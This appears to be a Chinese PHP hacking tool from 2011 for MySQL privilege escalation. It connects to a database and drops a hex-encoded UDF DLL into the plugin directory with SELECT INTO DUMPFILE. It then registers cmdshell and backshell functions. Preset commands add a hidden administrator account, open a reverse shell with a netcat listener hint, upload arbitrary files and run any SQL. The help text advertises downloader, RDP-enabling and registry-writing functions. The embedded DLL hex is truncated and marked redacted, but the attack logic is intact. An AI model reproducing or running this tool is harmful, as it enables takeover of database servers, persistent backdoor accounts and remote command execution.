- <?php
- if (get_magic_quotes_gpc()) {
- function stripslashes_deep($value)
- {
- $value = is_array($value) ?
- array_map('stripslashes_deep', $value) :
- stripslashes($value);
- return $value;
- }
- $_POST = array_map('stripslashes_deep', $_POST);
- $_GET = array_map('stripslashes_deep', $_GET);
- $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
- $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
- }
- session_start();
- if($_GET['action']=='logout'){
- foreach($_COOKIE["connect"] as $key=>$value){
- setcookie("connect[$key]","",time()-1);
- }
- header("Location:".$_SERVER["SCRIPT_NAME"]);
- }
- if(!empty($_POST['submit'])){
- setcookie("connect");
- setcookie("connect[host]",$_POST['host']);
- setcookie("connect[name]",$_POST['name']);
- setcookie("connect[pass]",$_POST['pass']);
- setcookie("connect[dbname]",$_POST['dbname']);
- echo "<!script>location.href='?action=connect'</script>";
- }
- /*
- foreach($_COOKIE["connect"] as $key=>$value){
- echo $key.":".$value."<br>";
- }
- */
- if(empty($_GET["action"])){
- ?>
- <form name="form1" method="post" action="?action=connect">
- <div align="center">
- <table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
- <caption>
- <h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
- </caption>
- <tr>
- <td width="66">host:</td>
- <td width="270"><input name="host" type="text" id="host" size="34"></td>
- </tr>
- <tr>
- <td>name:</td>
- <td><input name="name" type="text" id="name" size="34"></td>
- </tr>
- <tr>
- <td>pass:</td>
- <td><input name="pass" type="text" id="pass" size="34"></td>
- </tr>
- <tr>
- <td>dbname:</td>
- <td><input name="dbname" type="text" id="dbname" size="34"></td>
- </tr>
- <tr>
- <td colspan="2"><div align="center">
- <input type="submit" name="submit" value="提交">
-
- <input type="reset" name="Submit" value="重置">
- </div></td>
- </tr>
- </table>
- </div>
- </form>
- <div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
- Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
- <a href="http://www.moonhack.org" target="_blank">版本更新 (version update)</a>
- </div>
- <?php
- exit;
- }
- $link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
- if(!$link){
- echo "连接失败.".mysql_error()."<!a href='javascr ipt:history.back()'>返回重填 (previous history)</a></script>";
- exit;
- }else{
- echo "连接成功 (connection success)<br>";
- $str=mysql_get_server_info();
- echo 'MYSQL版本 ( MySqlversion):'.$str."<br>";
- echo "<hr>";
- if($str[2]>=1){
- $sql="SHOW VARIABLES LIKE '%plugin_dir%'";
- $row=mysql_query($sql);
- $rows=mysql_fetch_row($row);
- $pa=str_replace('\\','/',$rows[1]);
- $path=$_SESSION['path']=$pa."/moonudf.dll";
- }else{
- $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
- }}
- $conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
- if(!$conn){
- echo "数据不存在.".mysql_error()."<!a href='javas cript:history.back()'>返回重填</a></script>";
- exit;
- }else{
- echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
- }
- echo '<a href="?action=logout">点击退出 (mmd: click to exit)</a>';
- echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
- echo '<table width="297" height="53" border="1">';
- echo '<tr>';
- echo '<td colspan="2">当前路径 (mmd: curret path):';
- echo "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
- echo '</tr>';
- echo '<tr>';
- echo '<td width="235"><input type="file" name="file"></td>';
- echo '<td width="46"><input type="submit" name="subfile" value="上传文件(upload file)"></td>';
- echo '</tr>';
- echo '</table>';
- echo'</form>';
- if($_POST['subfile']){
- $upfile=$_POST['p'].$_FILES['file']['name'];
- if(is_uploaded_file($_FILES['file']['tmp_name']))
- {
- if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
- echo '上传失败(upload failed)';
- }else{
- echo '上传成功(upload success),路径为(path)'.$upfile;
- }}}
- echo '<hr>';
- echo '<form action="?action=dll" method="post"/>';
- echo '<table cellpadding="1" cellspacing="2">';
- echo '<tr><td>路径目录为 (mmd: dir/path)</td></tr>';
- echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
- echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
- echo '</table>';
- echo '</form>';
- echo '<hr>';
- if($_POST['subudf']){
- mysql_query('DROP TABLE Temp_udf');
- $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
- if(!$query){
- echo '创建临时表Temp_udf失败请查看失败内容 (Temp_udf failed to create a temporary table, please see the failure msg)'.mysql_error();
- }else{
- $shellcode=udfcode();
- $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
- if(!mysql_query($query)){
- echo 'udf插入失败请查看失败内容(udf insertion failed, see error message)'.mysql_error();
- }else{
- $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
- if(!mysql_query($query)){
- echo 'udf导出失败请查看失败内容(udf export failed. see error message)'.mysql_error();
- }else{
- mysql_query('DROP TABLE Temp_udf');
- echo '导出成功(export success)';
- }
- }
- }
- }
- echo '<form name="form2" method="post" action="">';
- echo '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
- echo '<tr>';
- echo '<td width="83">文件路径: (file path)</td>';
- echo '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
- echo '</tr>';
- echo '<tr>';
- echo '<td>目标路径: (target path)</td>';
- echo '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
- echo '</tr>';
- echo '<tr>';
- echo '<td colspan="2">';
- echo '<div align="right">';
- echo '<input type="submit" name="Submit2" value="Custom Export">';
- echo '</div></td></tr>';
- echo '</table>';
- echo '</form>';
- if(!empty($_POST['diy'])){
- $diy=str_replace('\\','/',$_POST['diy']);
- $diypath=str_replace('\\','/',$_POST['diypath']);
- mysql_query('DROP TABLE diy_dll');
- $s='create table diy_dll (cmd LONGBLOB)';
- if(!mysql_query($s)){
- echo '创建diy_dll表失败 (diy_dll creation fails)'.mysql_error();
- }else{
- $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
- if(!mysql_query($s)){
- echo "插入自定义文件失败 (custom file injection failed)".mysql_error();
- }else{
- $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
- if(!mysql_query($s)){
- echo "导出自定义dll出错 (Export Custom DLL error)".mysql_error();
- }else{
- mysql_query('DROP TABLE diy_dll');
- echo "成功导出自定义dll (Export Custom DLL Success)<br>";
- }}}}
- echo "<hr>";
- echo '自带命令 (shell command):<br>';
- echo '<form action="" method="post">';
- echo '<select name="mysql">';
- echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
- echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
- echo '<option value="select cmdshell(\'net user\')">查看用户 (View user))</option>';
- echo '<option value="select cmdshell(\'netstat -an\')">查看端口 (View Port)</option>';
- echo '<option value="select name from mysql.func">查看创建函数 (See created function)</option>';
- echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
- echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数 (Create backconnect)</option>';
- echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹(Backconnect exec..)</option>';
- echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
- echo '</select>';
- echo '<input type="submit" value="提交(Submit)" />';
- echo '</form>';
- echo '<form action="?action=sql" method="post">';
- echo '自定义SQL语句 (Custom SQL cmd):<br>';
- echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
- echo '<input type="submit" value="执行" />';
- echo '</form>';
- echo "回显结果 (Echo Results):<br>";
- echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
- if(!empty($_POST['mysql'])){
- echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
- $sql=mysql_query($sql) or die(mysql_error());
- while($rows=@mysql_fetch_row($sql)){
- foreach($rows as $value){
- echo $value;
- }}}
- echo '</textarea><br>';
- echo '<hr>';
- print("
- 功能说明 (Functionality Description):<br>
- MYSQL=>5.1<br>
- 自动获取高版本mysql调用函数路径(测试mysql5.5)(Mysql recent version autocalls paths/tested in v5.5)<br>
- MYSQL<=5.0默认为系统目录(defaults to system directory)<br>
- 自定义导出dll (Customize DLL export) <br>
- 默认udf自带函数(Udf comes with default function)<br>
- cmdshell 执行cmd;<br>
- downloader 下载者,到网上下载指定文件并保存到指定目录;<br>
- open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br>
- backshell 反弹Shell;<br>
- ProcessView 枚举系统进程;<br>
- KillProcess 终止指定进程;<br>
- regread 读注册表;<br>
- regwrite 写注册表;<br>
- shut 关机,注销,重启;<br>
- about 说明与帮助函数;<br>
- 默认添加管理员账号$darkmoon 密码123456 (Add $darkmoon as default admin acct, pwd:123456)<br>
- 默认反弹端口12345(default backconnect port 12345)<br>
- 不要随便删除刚创建的函数 重新生效要mysql重启(Do not delete the newly created function revalidation to restart mysql)<br>
- 别人的udf 请自行看别人的udf说明(Others udf pls see others' description)<br>
- 常用命令(common commands)<br>
- create function cmdshell returns string soname 'moonudf.dll'<br>
- select cmdshell('命令')<br>
- select backshell('你的ip',12345)<br>
- nc -l -p 12345
- ");
- function udfcode(){return "0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c001009000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e557061636b000000b00100001000000000000000000000000000000000000000000000600000e02e727372630000000050010000c00100e6da000000020000000000000000000000000000600000e088010010e89a02101b0000000e000000001000106b970210b7970210ba970210c8970210a3970210fc0f0010de960210e0960210809502101dba0110ed970210ffaf0110d2960210000400007c070000c40b0000b30200006604000090c0011000000000ffffffff0100000001000000010000000100000000000000000000000000000001000
- ///////////////////////// REDACTED FOR THE SECURITY PURPOSE //////////////////////////////////////
- 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";
- }
- ?>